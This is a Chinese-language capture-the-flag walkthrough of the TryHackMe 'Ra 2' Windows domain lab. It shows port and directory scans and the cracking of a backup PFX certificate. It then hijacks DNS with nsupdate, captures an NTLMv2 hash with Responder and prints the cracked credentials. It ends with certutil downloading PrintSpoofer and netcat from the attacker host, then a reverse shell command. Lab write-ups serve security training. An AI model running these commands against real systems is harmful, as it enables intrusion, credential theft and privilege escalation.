Ra 2
端口扫描
root@ip-10-10-99-12:~/ra2# nmap -sTCV -p- --min-rate 1000 -Pn 10.10.20.68
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-07 14:51 GMT
Nmap scan report for ip-10-10-20-68.eu-west-1.compute.internal (10.10.20.68)
Host is up (0.0029s latency).
Not shown: 65498 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://fire.windcorp.thm/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-07 14:53:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after: 2028-05-29T03:41:03
|_ssl-date: 2023-11-07T14:54:47+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after: 2028-05-29T03:41:03
|_ssl-date: 2023-11-07T14:54:43+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after: 2028-05-29T03:41:03
|_ssl-date: 2023-11-07T14:54:41+00:00; 0s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after: 2028-05-29T03:41:03
|_ssl-date: 2023-11-07T14:54:45+00:00; 0s from scanner time.
3269/tcp open ssl Microsoft SChannel TLS
| fingerprint-strings:
| TLSSessionReq:
| fire.windcorp.thm0
| 200529033108Z
| 280529034103Z0
| fire.windcorp.thm0
| N\xd8
| ?}I?
| qp9L
| fire.windcorp.thm
| selfservice.windcorp.thm
| selfservice.dev.windcorp.thm0
| {V,7
|_ Af]Z
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after: 2028-05-29T03:41:03
|_ssl-date: 2023-11-07T14:54:40+00:00; +1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2023-11-06T14:32:15
|_Not valid after: 2024-05-07T14:32:15
|_ssl-date: 2023-11-07T14:54:42+00:00; +1s from scanner time.
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| features:
|
| errors:
| invalid-namespace
| (timeout)
| unknown:
|
| auth_mechanisms:
|
| stream_id: b0p5595cs5
| compression_methods:
|
|_ capabilities:
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
|
| features:
|
| unknown:
|
| errors:
| (timeout)
| capabilities:
|
| auth_mechanisms:
|
|_ compression_methods:
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| features:
|
| errors:
| invalid-namespace
| (timeout)
| unknown:
|
| auth_mechanisms:
|
| stream_id: 8uvo2ybdav
| compression_methods:
|
|_ capabilities:
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
|
| features:
|
| unknown:
|
| errors:
| (timeout)
| capabilities:
|
| auth_mechanisms:
|
|_ compression_methods:
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| features:
|
| errors:
| host-unknown
| (timeout)
| unknown:
|
| auth_mechanisms:
|
| stream_id: d8gwm1suv
| compression_methods:
|
|_ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| features:
|
| errors:
| invalid-namespace
| (timeout)
| unknown:
|
| auth_mechanisms:
|
| stream_id: aqnlaj7qe2
| compression_methods:
|
|_ capabilities:
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
|
| features:
|
| unknown:
|
| errors:
| (timeout)
| capabilities:
|
| auth_mechanisms:
|
|_ compression_methods:
7070/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 07 Nov 2023 14:53:40 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 07 Nov 2023 14:53:47 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequest, DNSVersionBindReq:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 07 Nov 2023 14:54:01 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 07 Nov 2023 14:54:01 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
DNS
root@ip-10-10-36-187:~/ra2# dig windcorp.thm any @10.10.225.75
; <<>> DiG 9.11.3-1ubuntu1.18-Ubuntu <<>> windcorp.thm any @10.10.225.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63785
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;windcorp.thm. IN ANY
;; ANSWER SECTION:
windcorp.thm. 600 IN A 10.10.225.75
windcorp.thm. 3600 IN NS fire.windcorp.thm.
windcorp.thm. 3600 IN SOA fire.windcorp.thm. hostmaster.windcorp.thm. 294 900 600 86400 3600
windcorp.thm. 86400 IN TXT "THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources}"
;; ADDITIONAL SECTION:
fire.windcorp.thm. 3600 IN A 192.168.112.1
fire.windcorp.thm. 3600 IN A 10.10.225.75
;; Query time: 0 msec
;; SERVER: 10.10.225.75#53(10.10.225.75)
;; WHEN: Wed Nov 08 14:13:05 GMT 2023
;; MSG SIZE rcvd: 302
80
从端口扫描中可以发现一个子域 fire.windcorp.thm, 所以应当对其进行继续搜索
root@ip-10-10-36-187:~/ra2# gobuster dir -u https://fire.windcorp.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,bak,zip -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://fire.windcorp.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,bak,zip,txt
[+] Timeout: 10s
===============================================================
2023/11/08 14:14:23 Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/css (Status: 301)
/Index.html (Status: 200)
/vendor (Status: 301)
/IMG (Status: 301)
/INDEX.html (Status: 200)
/CSS (Status: 301)
/Img (Status: 301)
/powershell (Status: 302)
===============================================================
2023/11/08 14:40:27 Finished
===============================================================
- vendor : 没有权限访问
- powershell : 看样子是远程管理但是需要账号
- 主页面 : 看起来像之前做的 Ra 靶机(看一下题目也对的上)
查看网页 SSL 证书, 在其中发现几个子域, 将其添加到 hosts 文件中
- fire.windcorp.thm : 主域, 存在漏洞的概率性比较小, 对应的存在一些用户名
- selfservice.windcorp.thm : 需要登陆, 尝试暴力破解无果
- selfservice.dev.windcorp.thm : 看名字估计就是这里了
root@ip-10-10-36-187:~/ra2# gobuster dir -u https://selfservice.dev.windcorp.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,bak,zip -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://selfservice.dev.windcorp.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,bak,zip
[+] Timeout: 10s
===============================================================
2023/11/08 14:01:19 Starting gobuster
===============================================================
/index.html (Status: 200)
/Index.html (Status: 200)
/backup (Status: 301)
/Backup (Status: 301)
/INDEX.html (Status: 200)
- backup : 发现 pfx(可以下载) 、config 文件
对应的 pfx 文件存在一些加密, 需要进行解密
root@ip-10-10-36-187:~/ra2# /opt/john/pfx2john.py cert.pfx > hash.txt
root@ip-10-10-36-187:~/ra2# john hash.txt -wordlist=`locate rockyou.txt` --format=pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ganteng (cert.pfx)
1g 0:00:00:00 DONE (2023-11-08 14:07) 1.612g/s 3303p/s 3303c/s 3303C/s clover..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
root@ip-10-10-36-187:~/ra2#
基于证书导出其中的公私钥
root@ip-10-10-36-187:~/ra2# openssl pkcs12 -in cert.pfx -nocerts -out private.pem -nodes
Enter Import Password:
root@ip-10-10-36-187:~/ra2# openssl pkcs12 -in cert.pfx -out public.pem -clcerts -nokeys
Enter Import Password:
root@ip-10-10-36-187:~/ra2# ls
cert.pfx hash.txt hydra.restore private.pem public.pem user.txt
DNS 更新
首先应该修改两个证书
root@ip-10-10-36-187:~/ra2# locate Responder.conf
/opt/Responder/Responder.conf
root@ip-10-10-36-187:~/ra2# cat /opt/Responder/Responder.conf
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = /root/ra2/public.pem # 修改这里
SSLKey = /root/ra2/private.pem # 修改这里
之后开启监听, 并修改对应的 DNS 信息就可以获取到一个 NTLM Hash, 之后将其解密就可以得到一个用户的密码
root@ip-10-10-36-187:~/ra2# nsupdate
> server 10.10.225.75
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 4567 A 10.10.36.187 (这个 IP 要是自己的 IP 地址)
> send
> quit
root@ip-10-10-36-187:~/ra2# responder -I ens5
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[SMB] NTLMv2-SSP Client : ::ffff:10.10.225.75
[SMB] NTLMv2-SSP Username : WINDCORP\edwardle
[SMB] NTLMv2-SSP Hash : edwardle::WINDCORP:5e4436dc7f19e9ab:0920B6CD4C674DA7169FE7AB6C827163:0101000000000000806907BB5B12DA012BC511F4A31772CC00000000020008005700520057004F0001001E00570049004E002D0039004700590037004D00470038005A0043004200300004003400570049004E002D0039004700590037004D00470038005A004300420030002E005700520057004F002E004C004F00430041004C00030014005700520057004F002E004C004F00430041004C00050014005700520057004F002E004C004F00430041004C0007000800806907BB5B12DA01060004000200000008003000300000000000000001000000002000002AF80F21A6099859849390B5D3C34D61E2A4AD368C0DD733C0F3BCAB912777260A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00330036002E003100380037000000000000000000
root@ip-10-10-36-187:~/ra2# john hash.txt --wordlist=`locate rockyou.txt`
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!Angelus25! (edwardle)
1g 0:00:00:20 DONE (2023-11-08 15:58) 0.04786g/s 686506p/s 686506c/s 686506C/s !Sketchy!..!@#fire123
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
最终得到账号密码为 : edwardle:!Angelus25!
后渗透
edware
edware —> administartor
执行命令发现用户 edware 存在特权可以借此来进行权限提升 Abusing Tokens
$ certutil -urlcache -split -f http://10.10.36.187:8000/PrintSpoofer64.exe PrintSpoofer64.exe
$ certutil -urlcache -split -f http://10.10.36.187:8000/nc.exe nc.exe
$ .\PrintSpoofer64.exe -c ".\nc.exe 10.10.36.187 4444 -e cmd"
